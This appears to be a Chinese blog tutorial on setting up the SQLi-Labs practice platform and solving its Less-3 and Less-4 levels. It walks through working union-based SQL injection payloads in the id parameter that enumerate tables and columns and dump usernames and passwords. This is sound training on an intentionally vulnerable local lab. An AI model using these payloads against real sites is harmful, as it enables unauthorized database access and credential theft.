我是靠谱客的博主 稳重水杯,最近开发中收集的这篇文章主要介绍web安全sql注入篇——sqls-labs的安装和注入前言一、sqls-labs是什么?二、windows环境安装三、修改配置文件四、访问sqls-labs,并点击「Setup/reset Database for labs」来初始化创建数据库五、注入第三关lees3六、注入第四关less4,觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

文章目录

  • 前言
  • 一、sqls-labs是什么?
  • 二、windows环境安装
  • 三、修改配置文件
  • 四、访问sqls-labs,并点击「Setup/reset Database for labs」来初始化创建数据库
  • 五、注入第三关lees3
  • 六、注入第四关less4


前言

我们在刚学习 SQL 注入的时候,往往都需要一个能 SQL 注入的网站进行 SQL 注入学习。如果直接去网上寻找存在 SQL 注入的网站对新手来说有些难度,因此我们一般都是在本地搭建一个能 SQL 注入测试的网站。

这里就来讲解一下 SQLi-Labs 的下载,安装,搭建教程。

注意: mysql 版本一定要设置成 php5 以上,php5 以上才有 information_schema 库。

一、sqls-labs是什么?

SQLi-Labs 是一个专业的 SQL 注入练习平台,它适用于 GET 和 POST 等多场景的注入。

二、windows环境安装

使用 phpStudy 这个软件一键安装,方便快捷。
在这里插入图片描述创建好后重新启动一下小皮。

三、修改配置文件

修改 sqlisql-connections 目录下的 db-creds.inc 文件内容,将数据库默认的信息修改为自己数据库的信息

在这里插入图片描述主要是修改 dbpass 的内容,小皮的 Windows 版中默认为 root,所以这里直接添加root,如果使用其他环境则根据具体环境修改即可。

四、访问sqls-labs,并点击「Setup/reset Database for labs」来初始化创建数据库

在这里插入图片描述如果出现这个界面,就表名sqls-labs配置成功
在这里插入图片描述

五、注入第三关lees3

1.在URL框输入?id=1能得到闭合符号为’)。
在这里插入图片描述

2.依次输入?id=1’) order by 7 – -
?id=1’) order by 4 – -
?id=1’) order by 3 – -
可以得到只有3列数据在这里插入图片描述
在这里插入图片描述
在这里插入图片描述3.输入?id=-1’) union select 1,2,3 – -
只显示了2,3,说明只有2和3可以当注入口。
在这里插入图片描述
4.输入?id=-1’) union select 1,database(),version() – -
爆出数据库版本为5.7.26,数据库名为security。在这里插入图片描述
5.输入?id=-1’) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘security’ – -
爆出了security库的四个表:emails、referers、uagents、users
在这里插入图片描述
6.根据第五步得到的信息,可以大致推测到敏感信息位于users表。接下来输入:?id=-1’) union select 1,2,group_concat(column_name) from information_schema.columns where columns.table_schema=‘security’ and columns.table_name=‘users’ – -
爆出user的三个列:id、username、password
在这里插入图片描述
7.根据第6部得到的信息,就可以知道了用户名和密码位于user表下的username和password列。
输入:?id=-1’) union select 1,group_concat(username),group_concat(password) from users – -
爆出了敏感数据
在这里插入图片描述

六、注入第四关less4

1.同理,输入:?id=1 使用转义符号爆出闭合符号为")
在这里插入图片描述2.输入:?id=1") order by 3 – -
得出只有三列数据
在这里插入图片描述3.输入:?id=-1") union select 1,2,3 – -
只显示了2,3,说明只有2和3可以当注入口。
在这里插入图片描述4.输入?id=-1") union select 1,database(),version() – -
爆出数据库版本为5.7.26,数据库名为security。

在这里插入图片描述
5.输入?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘security’ – -
爆出了security库的四个表:emails、referers、uagents、users在这里插入图片描述
6…根据第五步得到的信息,可以大致推测到敏感信息位于users表。接下来输入:?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where columns.table_schema=‘security’ and columns.table_name=‘users’ – -
爆出user的三个列:id、username、password在这里插入图片描述
7.根据第6部得到的信息,就可以知道了用户名和密码位于user表下的username和password列。
输入:?id=-1") union select 1,group_concat(username),group_concat(password) from users – -
爆出了敏感数据在这里插入图片描述

最后

以上就是稳重水杯为你收集整理的web安全sql注入篇——sqls-labs的安装和注入前言一、sqls-labs是什么?二、windows环境安装三、修改配置文件四、访问sqls-labs,并点击「Setup/reset Database for labs」来初始化创建数据库五、注入第三关lees3六、注入第四关less4的全部内容,希望文章能够帮你解决web安全sql注入篇——sqls-labs的安装和注入前言一、sqls-labs是什么?二、windows环境安装三、修改配置文件四、访问sqls-labs,并点击「Setup/reset Database for labs」来初始化创建数据库五、注入第三关lees3六、注入第四关less4所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(65)

评论列表共有 0 条评论

立即
投稿
返回
顶部